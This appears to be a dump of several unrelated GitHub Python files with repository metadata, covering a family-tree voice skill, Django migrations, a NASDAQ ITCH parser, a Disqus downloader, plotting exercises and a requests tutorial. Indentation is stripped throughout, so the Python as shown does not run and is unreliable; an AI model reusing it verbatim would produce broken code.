family_rank = message.data.get("FamilyMemberKeyword")
# print(family_rank)
with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
family = json.load(read_file)
membersname = family['family_dictionary']['members']
namelist = []
namegroup = ""
i=0
while i< len(membersname):
if (membersname[i]['rank'] == family_rank):
namelist.append(membersname[i]['first_name'])
i = i+1
i=1
if len(namelist) ==0 :
self.speak_dialog('you have no {}'.format(family_rank))
elif len(namelist) ==1 :
self.speak_dialog('{} is your {}'.format(namelist[0],family_rank))
else:
namegroup = namelist[0]
while i< len(namelist):
namegroup = namegroup +" and " + namelist[i]
i = i+1
self.speak_dialog('{} are your {}'.format(namegroup,family_rank))
#### Find Living Place of someone
@intent_handler(IntentBuilder("LivingPlaceIntent").require("LivingPlaceKeyword").require("FamilyFirstName"))
def handle_living_place(self, message):
member = message.data.get('FamilyFirstName')
with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
family = json.load(read_file)
membersname = family['family_dictionary']['members']
memberslivingplace ={}
i=0
foundit = ""
while i< len(membersname):
if (member.find(membersname[i]['first_name'].lower())>=0):
member = membersname[i]['first_name']
foundit = "found"
i=i+1
if (foundit==""):
self.speak('Sorry, I missed something')
else:
print(member)
i=0
while i< len(membersname):
who = membersname[i]['first_name']
where = membersname[i]['location']
memberslivingplace[who] = where
i=i+1
livingplace = memberslivingplace[member]
self.speak('{} is from {}'.format(member, livingplace))
#### Find Age of someone
@intent_handler(IntentBuilder("SomeOneAgeIntent").require("SomeOneAgeKeyword").require("FamilyFirstName"))
def handle_someone_age(self, message):
member = message.data.get('FamilyFirstName')
with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
family = json.load(read_file)
membersname = family['family_dictionary']['members']
membersage ={}
foundit = ""
i=0
while i< len(membersname):
if (member.find(membersname[i]['first_name'].lower())>=0):
member = membersname[i]['first_name']
foundit = "found"
i=i+1
if (foundit==""):
self.speak('Sorry, I missed something')
else:
print(member)
i=0
while i< len(membersname):
who = membersname[i]['first_name']
so_age = membersname[i]['age']
membersage[who] = so_age
i=i+1
member_age = membersage[member]
if (member_age == "dead"):
self.speak('{} is {}'.format(member, member_age))
else:
self.speak('{} is {} old'.format(member, member_age))
#### Find feature of someone
@intent_handler(IntentBuilder("SomeOneFeatureIntent").require("SomeOneFeatureKeyword").require("FamilyFirstName"))
def handle_someone_feature(self, message):
member = message.data.get('FamilyFirstName')
with open(join(os.path.dirname(__file__), 'familybook.json'), "r") as read_file:
family = json.load(read_file)
membersname = family['family_dictionary']['members']
membersfeature ={}
foundit = ""
i=0
while i< len(membersname):
if (member.find(membersname[i]['first_name'].lower())>=0):
member = membersname[i]['first_name']
foundit = "found"
i=i+1
if (foundit==""):
self.speak('Sorry, I missed something')
else:
print(member)
i=0
while i< len(membersname):
who = membersname[i]['first_name']
so_feature = membersname[i]['feature']
membersfeature[who] = so_feature
i=i+1
member_feature = membersfeature[member]
if (member_feature == ""):
self.speak('Sorry, I don\'t know more on {}'.format(member))
else:
self.speak('{} is really {}'.format(member, member_feature))
def stop(self):
pass
def create_skill():
return MyFamilyTreeSkill()
| [
"noreply@github.com"
] | noreply@github.com |
22785d6ec49c706671469a0abffb4c131635c47f | 599bcf2ee1ddfbd8f7057c9ec7c428db11bfc072 | /mainapp/migrations/0006_remove_order_order_data.py | 5bbbbf624a7ad10de7d964ab99a206aa97dde389 | [] | no_license | Tr0612/athinath | 4561e939573ba24c3a014a84884f1387d57e7441 | 760dc244d877c4dfda24de16d08a38c20c5bdbbc | refs/heads/master | 2023-02-23T12:53:46.195529 | 2021-01-28T07:36:23 | 2021-01-28T07:36:23 | 333,438,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | # Generated by Django 3.1.4 on 2020-12-25 13:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0005_carousel'),
]
operations = [
migrations.RemoveField(
model_name='order',
name='order_data',
),
]
| [
"Ghost0612@users.noreply.github.com"
] | Ghost0612@users.noreply.github.com |
54534400b18c5e41880fb6c91712b0accbd4e658 | ce3dd61cb00be3ab3b007ccc572e15ebc4624939 | /itch_factory.py | 07ff3c6ca67486be0f68e78b602a0f96c6ef2bef | [
"MIT"
] | permissive | Shutong-Song/nasdaq-ITCH-5.0-parser | 6a8bd704bf8928648490abf3b1a79015ec0ec1d2 | 5fef246625ebd1af6ed073cf37120fef61ca49a2 | refs/heads/master | 2023-03-09T05:01:47.180999 | 2021-03-01T03:00:58 | 2021-03-01T03:00:58 | 181,784,743 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 8,414 | py | import struct
def system_event_message(msg):
#system event message format (total 5 variables)
#including: message type("S"), stock locate, tracking number, timestamp, event code,
val = struct.unpack('!HH6sc',msg)
val = list(val);
if len(val) == 4:
return val
else:
return []
def stock_directory_message(msg):
#stock directory format (total 17 variables)
#including: message type("R"), stock locate, tracking number, timestamp, stock, market category,
# FinancialStatus indicator, round lot size, round lots only, issue classification,
# issue subtype, authenticity, short sale threhold indicator, IPO flag, LULDReference price tier,
# ETP flag, ETP leverage factor, inverse indicator
val = struct.unpack('!HH6s8sccIcc2scccccIc',msg);
val = list(val);
if len(val) == 16:
return val
else:
return []
def stock_trading_action(msg):
#stock trading action format (total 8 variables)
#including: message type("H"), stock locate, tracking number, timestamp,stock, trading state, reserved, reason
val = struct.unpack('!HH6s8scc4s',msg);
val = list(val);
if len(val) == 7:
return val
else:
return []
def short_sale_price_test(msg):
#Reg SHO registriction format (total 6 variables)
#including: message type("Y"), stock locate, tracking number, timestamp,stock, Reg SHO action
val = struct.unpack('!HH6s8sc',msg);
val = list(val);
if len(val) == 5:
return val
else:
return []
def market_participation_position(msg):
#market participant position format (total 9 variables)
#including: message type("L"), stock locate, tracking number, timestamp,MPID, stock, primary market maker, market maker mode,market participant state
val = struct.unpack('!HH6s4s8sccc',msg);
val = list(val);
if len(val) == 8:
return val
else:
return []
def mwcb_decline_level_message(msg):
#MWCB decline level messsage format (total 7 variables)
#including: message type("V"), stock locate, tracking number, timestamp, level 1, level 2, level 3
val = struct.unpack('!HH6sQQQ',msg);
val = list(val);
val[3:] = map(float,val[3:]);
val[3:] = map(lambda x:x/(pow(10,8)),val[3:]);
if len(val) == 6:
return val
else:
return []
def mwcb_status_message(msg):
#MWCB status messsage format (total 5 variables)
#including: message type("W"), stock locate, tracking number, timestamp, breached level
val = struct.unpack('!HH6sc',msg);
val = list(val);
if len(val) == 4:
return val
else:
return []
def ipo_quoting_period_update(msg):
#MIPO Quoting period update format (total 8 variables)
#including: message type("K"), stock locate, tracking number, timestamp,stock, IPO quotation release time,IPO quotation release qualifier, IPO price
val = struct.unpack('!HH6s8sIcL',msg);
val = list(val);
val[6] = float(val[6]);
val[6] = val[6]/10000;
if len(val) == 7:
return val
else:
return []
def LULD_Auction_Collar(msg):
#LULD auction collar format (total 9 variables)
#including: message type("J"), stock locate, tracking number, timestamp, stock, auction collar reference price, upper auction collar price, lower auction collar price, auction collar extension
val = struct.unpack('!HH6s8sLLLI',msg);
val = list(val);
val[4:7] = map(float,val[4:7]);
val[4:7] = map(lambda x:x/10000,val[4:7]);
if len(val) == 8:
return val
else:
return []
def Operational_Halt(msg):
#operational halt format (total 7 variables)
#including: message type("h"), stock locate, tracking number, timestamp, stock, market code, operational halt action
val = struct.unpack('!HH6s8scc',msg);
val = list(val);
#val[8] = float(val[8]);
#val[8] = val[8]/10000;
if len(val) == 6:
return val
else:
return []
def add_order_message(msg):
#add order message format (total 9 variables)
#including: message type("A"), stock locate, tracking number, timestamp, order reference number, buy/sell indicator, shares, stock, price
val = struct.unpack('!HH6sQcI8sL',msg);
val = list(val);
val[7] = float(val[7]);
val[7] = val[7]/10000;
if len(val) == 8:
return val
else:
return []
def add_order_with_mpid(msg):
#add order mpid format (total 10 variables)
#including: message type("F"), stock locate, tracking number, timestamp,order reference number, buy/sell indicator, shares, stock, price, attribution
val = struct.unpack('!HH6sQcI8sL4s',msg);
val = list(val);
val[7] = float(val[7]);
val[7] = val[7]/10000;
if len(val) == 9:
return val
else:
return []
def order_executed_message(msg):
#order executed message format (total 7 variables)
#including: message type("E"), stock locate, tracking number, timestamp,order reference number, executed shares, match number
val = struct.unpack('!HH6sQIQ',msg);
val = list(val);
if len(val) == 6:
return val
else:
return []
def order_executed_price_message(msg):
#order executed price message format (total 9 variables)
#including: message type("C"), stock locate, tracking number, timestamp,order reference number, executed shares, match number, printable, execution price
val = struct.unpack('!HH6sQIQcL',msg);
val = list(val);
val[7] = float(val[7]);
val[7] = val[7]/10000;
if len(val) == 8:
return val
else:
return []
def order_cancel_message(msg):
#order cancel message format (total 6 variables)
#including: message type("X"), stock locate, tracking number, timestamp,order reference number,cancelled shares
val = struct.unpack('!HH6sQI',msg);
val = list(val);
if len(val) == 5:
return val
else:
return []
def order_delete_message(msg):
#order delete message format (total 5 variables)
#including: message type("X"), stock locate, tracking number, timestamp,order reference number
val = struct.unpack('!HH6sQ',msg);
val = list(val);
if len(val) == 4:
return val
else:
return []
def order_replace_message(msg):
#order replace message format (total 8 variables)
#including: message type("U"), stock locate, tracking number, timestamp,original order reference number, new order reference number, shares, price
val = struct.unpack('!HH6sQQIL',msg);
val = list(val);
val[6] = float(val[6]);
val[6] = val[6]/10000;
if len(val) == 7:
return val
else:
return []
def trade_message(msg):
#trade message format (total 10 variables)
#including: message type("P"), stock locate, tracking number, timestamp,order reference number, buy/sell indicator,shares, stock, price, match number
val = struct.unpack('!HH6sQcI8sLQ',msg);
val = list(val);
val[7] = float(val[7]);
val[7] = val[7]/10000;
if len(val) == 9:
return val
else:
return []
def cross_trade_message(msg):
#cross trade message format (total 9 variables)
#including: message type("Q"), stock locate, tracking number, timestamp, shares, staock, cross price, match number, cross type
val = struct.unpack('!HH6sQ8sLQc',msg);
val = list(val);
val[5] = float(val[5]);
val[5] = val[5]/10000;
if len(val) == 8:
return val
else:
return []
def broken_trade_execution_message(msg):
#broken trade/order execution message format (total 5 variables)
#including: message type("B"), stock locate, tracking number, timestamp, match number
val = struct.unpack('!HH6sQ',msg);
val = list(val);
if len(val) == 4:
return val
else:
return []
def net_order_imbalance_message(msg):
#net order imbalance indicator message format (total 13 variables)
#including: message type("I"), stock locate, tracking number, timestamp, paired shares, imbalance shares, imbalance direction, stock, far price, near price, current reference price, cross type, price variation indicator
val = struct.unpack('!HH6sQQc8sLLLcc',msg);
val = list(val);
val[7:10] = map(float,val[7:10]);
val[7:10] = map(lambda x:x/10000,val[7:10]);
if len(val) == 12:
return val
else:
return []
| [
"simonsong004@gmail.com"
] | simonsong004@gmail.com |
9f0657298cc0520dbbf6f88dd654749d22acc7d9 | 88b0f614c91af8c00c2a132157cfd665dded48b1 | /python/api/disqus_posts.py | d8442b2866356e8917fae38c0fcf517203e7088f | [] | no_license | lemurproject/clueweb12pp-core | 74567939fd3066dbb461de106336ed513d2d6c7e | 3f083e71838c9c3c7067d5ec137592b852d912a0 | refs/heads/master | 2016-09-05T10:15:57.081189 | 2013-08-20T17:51:35 | 2013-08-20T17:51:35 | 10,918,647 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,338 | py | '''
Diqus posts download
'''
import argparse
import gzip
import json
import sys
import time
import traceback
from disqusapi import DisqusAPI, Paginator, APIError
FAILED_IDS = 'disqus_failed_posts.txt'
FAILED_IDS_HANDLE = open(FAILED_IDS, 'a+')
def load_downloaded_ids(downloaded):
downloaded_ids = set()
with open(downloaded, 'r') as downloaded_handle:
for new_line in downloaded_handle:
downloaded_ids.add(new_line.strip())
return downloaded_ids
def process_disqus_file(disqus_file, downloaded_file = None):
'''
process file
'''
downloaded_ids = load_downloaded_ids(downloaded_file)
f = gzip.open(disqus_file, 'r')
while True:
new_line = f.readline()
if not new_line:
return
parsed = json.loads(new_line)
if parsed['posts'] > 0:
if not parsed['id'] in downloaded_ids:
print parsed['id']
sys.stdout.flush()
def save_disqus_posts(ids_file, destination, api):
'''
Retrieve all posts in the thread given by thread-id
'''
f = gzip.open(destination, 'ab')
with open(ids_file, 'r') as ids_stream:
for new_id in ids_stream:
success = False
for _ in range(10):
try:
save_disqus_posts_for_thread(new_id.strip(), f, api)
success = True
break
except APIError as err:
# redownloading is the only choice.
# Wait out 2000 seconds since the API doesn't
# tell us how many seconds we need to wait for
if err.code == 2:
#sys.stderr.write(new_id)
continue # forum doesn't exist so just iterate out
sys.stderr.write('INFO: APIError' + '\n')
traceback.print_stack()
time.sleep(2000)
continue
except:
# retry downloading
continue
if success:
print new_id.strip()
sys.stdout.flush()
else:
sys.stderr.write(new_id.strip() + '\n')
f.close()
def save_disqus_posts_for_thread(thread_id, destination_handle, api):
paginator = Paginator(api.threads.listPosts, thread = thread_id)
for result in paginator():
destination_handle.write(json.dumps(result) + '\n')
if __name__ == '__main__':
def parse_cmdline_args():
parser = argparse.ArgumentParser()
parser.add_argument('--secret-key', dest = 'secret_key')
parser.add_argument('--public-key', dest = 'public_key')
parser.add_argument('-d', '--dump-ids', dest = 'dump_ids', default = [], nargs = '+', help = 'Pass in a posts.gz file for us to obtain a list of posts')
parser.add_argument('-s', '--save-posts', dest = 'save_posts', default = None, help = 'Pass in a list of ids and we download the posts')
parser.add_argument('--destination', dest = 'destination', help = 'Where to store the resulting posts. Name must end in .gz')
parser.add_argument('--downloaded', dest = 'downloaded', default = None, help = 'Log file of previous download. We use this to sift out already downloaded ids')
parser.add_argument('--failed-ids', dest = 'failed_ids', default = None, help = 'Store ids that failed')
return parser.parse_args()
parsed = parse_cmdline_args()
if parsed.dump_ids:
for filename in parsed.dump_ids:
process_disqus_file(filename, parsed.downloaded)
elif parsed.save_posts:
FAILED_IDS = parsed.failed_ids
FAILED_IDS_HANDLE = open(FAILED_IDS, 'a+')
#sys.stderr = FAILED_IDS_HANDLE
api = DisqusAPI(parsed.secret_key, parsed.public_key)
save_disqus_posts(parsed.save_posts, parsed.destination, api) | [
"shriphanip@gmail.com"
] | shriphanip@gmail.com |
ae67f1d6bb50b24ac15c333c79ab4b25c82918c0 | 41ddf80398589255c1de3316667505802aadbdcb | /Week 7 Assignment.py | 5bc60bb9fbde5558b4b287a3e450fcc77a82bdce | [] | no_license | Khaninder/Data-Viz | a6fa764230684c7432184783e0a818cc337863ae | fabc6f8bdb5cf5e960390db871f6127b4e64c609 | refs/heads/master | 2022-04-17T18:30:34.195839 | 2020-04-10T01:10:50 | 2020-04-10T01:10:50 | 250,364,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,776 | py | #!/usr/bin/env python
# coding: utf-8
# In[23]:
import numpy as np
import pandas as pd
# In[10]:
import matplotlib.pyplot as plt
# In[19]:
get_ipython().run_line_magic('matplotlib', 'inline')
plt.style.use('seaborn-whitegrid')
X = [590,540,740,130,810,300,320,230,470,620,770,250]
Y = [32,36,39,52,61,72,77,75,68,57,48,48]
plt.scatter(X,Y)
plt.xlim(0,1000)
plt.ylim(0,100)
#scatter plot color
plt.scatter(X, Y, s=60, c='red', marker='^')
#change axes ranges
plt.xlim(0,1000)
plt.ylim(0,100)
#add title
plt.title('Relationship Between Temperature and Iced Coffee Sales')
#add x and y labels
plt.xlabel('Sold Coffee')
plt.ylabel('Temperature in Fahrenheit')
#show plot
plt.show()
# In[20]:
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
plt.style.use('seaborn-whitegrid')
#Create empty figure
fig=plt.figure()
ax=plt.axes()
x=np.linspace(0,10,1000)
ax.plot(x, np.sin(x));
plt.plot(x, np.sin(x))
plt.plot(x, np.cos(x))
# set the x and y axis range
plt.xlim(0, 11)
plt.ylim(-2, 2)
plt.axis('tight')
#add title
plt.title('Plotting data using sin and cos')
# In[26]:
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
import numpy as np
import pandas as pd
import seaborn as sns
plt.style.use('classic')
plt.style.use('seaborn-whitegrid')
# Create some data
data = np.random.multivariate_normal([0, 0], [[5, 2], [2, 2]], size=2000)
data = pd.DataFrame(data, columns=['x', 'y'])
# Plot the data with seaborn
sns.distplot(data['x'])
sns.distplot(data['y']);
# In[27]:
for col in 'xy':
sns.kdeplot(data[col], shade=True)
# In[28]:
sns.kdeplot(data);
# In[29]:
with sns.axes_style('white'):
sns.jointplot("x", "y", data, kind='kde');
# In[30]:
with sns.axes_style('white'):
sns.jointplot("x", "y", data, kind='hex')
# In[31]:
sns.pairplot(data);
# In[77]:
import plotly.offline as offline
import plotly.graph_objs as go
offline.plot({'data': [{'y': [14, 22, 30, 44]}],'layout': {'title': 'Offline Plotly', 'font':dict(size=16)}}, image='png')
# In[76]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(200,6),index= pd.date_range('1/9/2009', periods=200), columns= list('ABCDEF'))
df.plot(figsize=(20, 10)).legend(bbox_to_anchor=(1, 1))
# In[74]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.bar(figsize=(20, 10)).legend(bbox_to_anchor=(1.1, 1))
# In[73]:
import pandas as pd
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.bar(stacked=True, figsize=(20, 10)).legend(bbox_to_anchor=(1.1, 1))
# In[72]:
import pandas as pd
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.barh(stacked=True, figsize=(20, 10)).legend(bbox_to_anchor=(1.1, 1))
# In[71]:
import pandas as pd
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb', 'March','April', 'May'])
df.plot.hist(bins= 20, figsize=(10,8)).legend(bbox_to_anchor=(1.2,1))
# In[67]:
import pandas as pd
import numpy as np
df=pd.DataFrame({'April':np.random.randn(1000)+1,'May':np.random. randn(1000),'June': np.random.randn(1000) - 1}, columns=['April',
'May', 'June'])
df.hist(bins=20)
# In[66]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5), columns=['Jan','Feb','March','April', 'May'])
df.plot.box()
# In[65]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5), columns= ['Jan','Feb','March','April', 'May'])
df.plot.area(figsize=(6, 4)).legend (bbox_to_anchor=(1.3, 1))
# In[64]:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.rand(20,5),columns= ['Jan','Feb', 'March','April', 'May'])
df.plot.scatter(x='Feb', y='Jan', title='Temperature over two months ')
# In[41]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
salesMen = ['Ahmed', 'Omar', 'Ali', 'Ziad', 'Salwa', 'Lila']
Mobile_Sales = [2540, 1370, 1320, 2000, 2100, 2150]
TV_Sales = [2200, 1900, 2150, 1850, 1770, 2000]
df = pd.DataFrame()
df ['Name'] =salesMen
df ['Mobile_Sales'] = Mobile_Sales
df['TV_Sales']=TV_Sales
df.set_index("Name",drop=True,inplace=True)
# In[42]:
df
# In[55]:
df.plot.bar( figsize=(20, 10), rot=0).legend(bbox_to_anchor=(1.2, 1))
plt.xlabel('Salesmen')
plt.ylabel('Sales')
plt.title('Sales Volume for two salesmen in \nJanuary and April 2017')
plt.show()
# In[58]:
df.plot.pie(subplots=True)
# In[50]:
df.plot.box()
# In[52]:
df.plot.area(figsize=(6,4)).legend(bbox_to_anchor=(1.5,1))
# In[63]:
df.plot.bar(stacked=True, figsize=(20, 10)).legend(bbox_to_anchor=(1.4, 1))
| [
"noreply@github.com"
] | noreply@github.com |
dbd5cecff92cba1fcf35215102752961f33b4718 | ce74ed4ad6834168b81d6ec5e53c80935f247fe1 | /python-wrapper/normalizer.py | 260c4e083f822c223ff64a447d4b415a33455417 | [] | no_license | chenghuige/melt | 6b6984243c71a85ec343cfaa67a66e3d1b48c180 | d2646ffe84eabab464b4bef6b31d218abdbf6ce5 | refs/heads/master | 2021-01-25T16:46:57.567890 | 2017-08-26T04:30:13 | 2017-08-26T04:30:13 | 101,304,210 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,386 | py | import os
import sys
import glob
from pyplusplus import module_builder
root = '/home/users/chenghuige/rsc/'
name = 'normalizer'
#define_symbols = ['GCCXML','PYTHON_WRAPPER','NO_BAIDU_DEP']
define_symbols = ['GCCXML','PYTHON_WRAPPER']
files = [
'./gezi.include.python/common_util.h',
'./gezi.include.python/log_util.h',
'./include.python/Prediction/Normalization/Normalizer.h',
'./include.python/Prediction/Normalization/NormalizerFactory.h',
'./gezi.include.python/Numeric/Vector/Vector.h',
]
paths = [
#'./gezi.include.python/Numeric/Vector/',
#'./include.python/MLCore/',
#'./include.python/Prediction/Instances/',
]
#import gezi
#for path in paths:
# files += [f for f in gezi.get_filepaths(path) if f.endswith('.h')]
include_paths=[
'third-64/glog',
'third-64/gflags',
'third-64/gtest',
'third-64/boost.1.53',
'lib2-64/bsl',
'lib2-64/postag',
'lib2-64/dict',
'lib2-64/libcrf',
'lib2-64/others-ex',
'lib2-64/ullib',
'lib2-64/ccode',
'public/odict/output',
'public/uconv/output',
'public/configure/output',
'app/search/sep/anti-spam/gezi/third/rabit',
]
include_paths_python = [
'app/search/sep/anti-spam/melt/python-wrapper',
]
include_paths_obsolute = [
'app/search/sep/anti-spam/melt/python-wrapper/gezi.include.python',
'lib2-64/wordseg',
'public/comlog-plugin',
'app/search/sep/anti-spam/gezi/third',
]
mb = module_builder.module_builder_t(
gccxml_path = '~/.jumbo/bin/gccxml',
define_symbols = define_symbols,
files = files,
include_paths = [root + f + '/include' for f in include_paths]
+ [root + f + '/include.python' for f in include_paths_python]
+ [root + f for f in include_paths_obsolute]
)
mb.build_code_creator( module_name='lib%s'%name )
mb.code_creator.user_defined_directories.append( os.path.abspath('.') )
mb.write_module( os.path.join( os.path.abspath('./'), '%s_py.cc'%name) )
| [
"chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97"
] | chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97 |
78f471f0902f14f995748f3ef4ffec01dceac880 | 44befe00cc663d36556876a336f583e17d6c4d24 | /python_review/2_max_in_list_2.py | 5c82d61616761aa477dd399b287f21b5644e6211 | [] | no_license | HannahYH/Python | 3d636a7cfdc399bafadf26b27972184f7a428a32 | fdca2f2f141856d9f7384e7de5ad050104bb8975 | refs/heads/master | 2020-03-27T15:49:39.462251 | 2019-12-11T09:18:11 | 2019-12-11T09:18:11 | 146,742,129 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | from random import seed, randint
# Prompts the user for a seed for the random number generator,
# and for a strictly positive number, nb_of_elements.
arg_for_seed = input('Input a seed for the random number generator: ')
try:
arg_for_seed = int(arg_for_seed)
except ValueError:
print('Input is not an integer, giving up.')
sys.exit()
nb_of_elements = input('How many elements do you want to generate? ')
try:
nb_of_elements = int(nb_of_elements)
except ValueError:
print('Input is not an integer, giving up.')
sys.exit()
if nb_of_elements <= 0:
print('Input should be strictly positive, giving up.')
sys.exit()
# Generates a list of nb_of_elements random integers between 0 and 99.
seed(arg_for_seed)
L = [randint(0, 99) for _ in range(nb_of_elements)]
# Prints out the list, computes the maximum element of the list, and prints it out.
print('\nThe list is:', L)
max_num = L[0]
min_num = L[0]
for item in L:
if item > max_num:
max_num = item
if item < min_num:
min_num = item
print(max_num, max(L))
print(max_num-min_num, max(L)-min(L))
| [
"noreply@github.com"
] | noreply@github.com |
2df3f8b7738ac707606738926f6e0f3cb24f0154 | 4fc1d1097ac124d0dcbb9c1e574efec5c38105d8 | /staff/migrations/0001_initial.py | 90b968534d808291b151eba7b45cc526e3b91f5a | [] | no_license | lilianwaweru/management | 077d3261e1f8bd5d6c84a0b40edd28249410279f | e71bd0b67266ca8715605574e52c81137a66eaeb | refs/heads/master | 2020-12-23T14:09:49.630171 | 2020-03-02T12:34:06 | 2020-03-02T12:34:06 | 237,173,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,659 | py | # Generated by Django 3.0.3 on 2020-03-02 11:14
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Work',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, upload_to='images/')),
('first_name', models.CharField(max_length=30)),
('other_names', models.CharField(max_length=30)),
('department', models.CharField(max_length=30)),
('employee_number', models.IntegerField()),
('identification_number', models.IntegerField()),
('nssf_number', models.IntegerField()),
('nhif_number', models.IntegerField()),
('date_of_birth', models.DateField()),
('employee_position', models.CharField(max_length=30)),
('secondary_shool', models.CharField(max_length=100)),
('higher_education', models.CharField(max_length=100)),
('level_of_education', models.CharField(max_length=100)),
('course', models.CharField(max_length=100)),
('other_certificates', models.CharField(max_length=100)),
('company', models.CharField(max_length=100)),
('position', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('tasks', models.CharField(max_length=1000)),
],
),
]
| [
"lilowesh.lw@gmail.com"
] | lilowesh.lw@gmail.com |
cabe6d29493ca641fcbe6e51d90fbb4d94f131c4 | a0062e2432c7ca908460ae59d3666f1c5c03fec7 | /20200805/Problema5.py | 5deb76957142c01a93aee84696201cd8906d8ee7 | [] | no_license | jonasmzsouza/fiap-tdsr-ctup | e9df6333c5407a8b4937e490b301e821d1f6f89e | 79fae7348a871951368368a8a126b00c22b709ca | refs/heads/master | 2022-12-29T04:17:01.182706 | 2020-10-19T15:32:00 | 2020-10-19T15:32:00 | 248,126,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | # Lista.pdf
# Problema 5
# Crie uma função em Python que recebe uma lista contendo números inteiros
# e aumente todos os valores da lista em uma unidade.
def aumenta(lista):
i = 0
while i < len(lista):
lista[i] = lista[i] + 1
i = i + 1
listaTeste = [1, 3, 6, 9, 12, 15, 18, 21]
aumenta(listaTeste)
print(listaTeste) | [
"ev.jonasmuniz@gmail.com"
] | ev.jonasmuniz@gmail.com |
0e5c2f08572df65160cf0040294875735675b65c | ce78a21f86faf0b9783b4cbc1df1fc562e80a2d8 | /Public/problem/D1/2070.큰놈,작은놈,같은놈.py | 94f01b7703da6229722d2d9bd4b809bf0e98293d | [] | no_license | jongjunpark/TIL | 18961c6518f78c8e3d80677f39caf32c727c5beb | 28f4d83e28851aac2dee4e77321543f1c811cc83 | refs/heads/master | 2023-03-17T01:45:51.867005 | 2022-10-31T10:44:05 | 2022-10-31T10:44:05 | 245,943,735 | 1 | 0 | null | 2023-03-05T17:15:39 | 2020-03-09T04:28:06 | Python | UTF-8 | Python | false | false | 260 | py | T = int(input())
for t in range(1,T+1):
numbers = list(map(int,input().split()))
if numbers[0] > numbers[1]:
print("#{} >".format(t))
elif numbers[0] == numbers[1]:
print("#{} =".format(t))
else:
print("#{} <".format(t)) | [
"poiufgin7373@naver.com"
] | poiufgin7373@naver.com |
f81be5ea05f4ea49f85bd863cbbd7e280fde0fa5 | 98e1716c1c3d071b2fedef0ac029eb410f55762c | /part6-import-webdata/No06-Performing-HTTP-requests-in-Python-using-requests.py | e58c16b5e4fa92f0aab1b600c1952cfbd1c58eaa | [] | no_license | iamashu/Data-Camp-exercise-PythonTrack | 564531bcf1dff119949cbb75e1fd63d89cb2779f | c72a4e806494f0e263ced9594597dc8882c2131c | refs/heads/master | 2020-07-22T00:23:12.024386 | 2019-04-12T09:24:42 | 2019-04-12T09:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,423 | py | #Performing HTTP requests in Python using requests
'''
Now that you've got your head and hands around makin
g HTTP requests using the urllib package, you're going to figure out how to do the same using the higher-level requests library. You'll once again be pinging DataCamp servers for their "http://www.datacamp.com/teach/documentation" page.
Note that unlike in the previous exercises using urllib, you don't have to close the connection when using requests!
#Instructions
100 XP
Import the package requests.
Assign the URL of interest to the variable url.
Package the request to the URL, send the request and catch the response with a single function requests.get(), assigning the response to the variable r.
Use the text attribute of the object r to return the HTML of the webpage as a string; store the result in a variable text.
Hit submit to print the HTML of the webpage.
'''
# Code
# Import package
#from urllib.request import Requests Error: not this lib
import requests
# Specify the url: url
url="http://www.datacamp.com/teach/documentation"
# Packages the request, send the request and catch the response: r
r=requests.get(url) #not Requests(url) And don't need to be closed
# Extract the response: text
text=r.text
# Print the html
print(text)
'''result: the format is differeent from the previous one
<!doctype html>
<html lang="en" data-direction="ltr">
<head>
<link href="https://fonts.intercomcdn.com" rel="preconnect" crossorigin>
<script src="https://www.googletagmanager.com/gtag/js?id=UA-39297847-9" async="async" nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0="></script>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-39297847-9');
</script>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>DataCamp Help Center</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="intercom:trackingEvent" content="{"name":"Viewed Help Center","metadata":{"action":"viewed","object":"educate_home","place":"help_center","owner":"educate"}}" />
<link rel="stylesheet" media="all" href="https://intercom.help/_assets/application-d1f7d2f5ecbab279e0c25a70c759326b30d53b9cc5832e8fdc7973fe1bc09ce2.css" />
<link rel="canonical" href="http://instructor-support.datacamp.com/"/>
<link href="https://static.intercomassets.com/assets/educate/educate-favicon-64x64-at-2x-52016a3500a250d0b118c0a04ddd13b1a7364a27759483536dd1940bccdefc20.png" rel="shortcut icon" type="image/png" />
<style>
.header, .avatar__image-extra { background-color: #263e63; }
.article a, .c__primary { color: #263e63; }
.avatar__fallback { background-color: #263e63; }
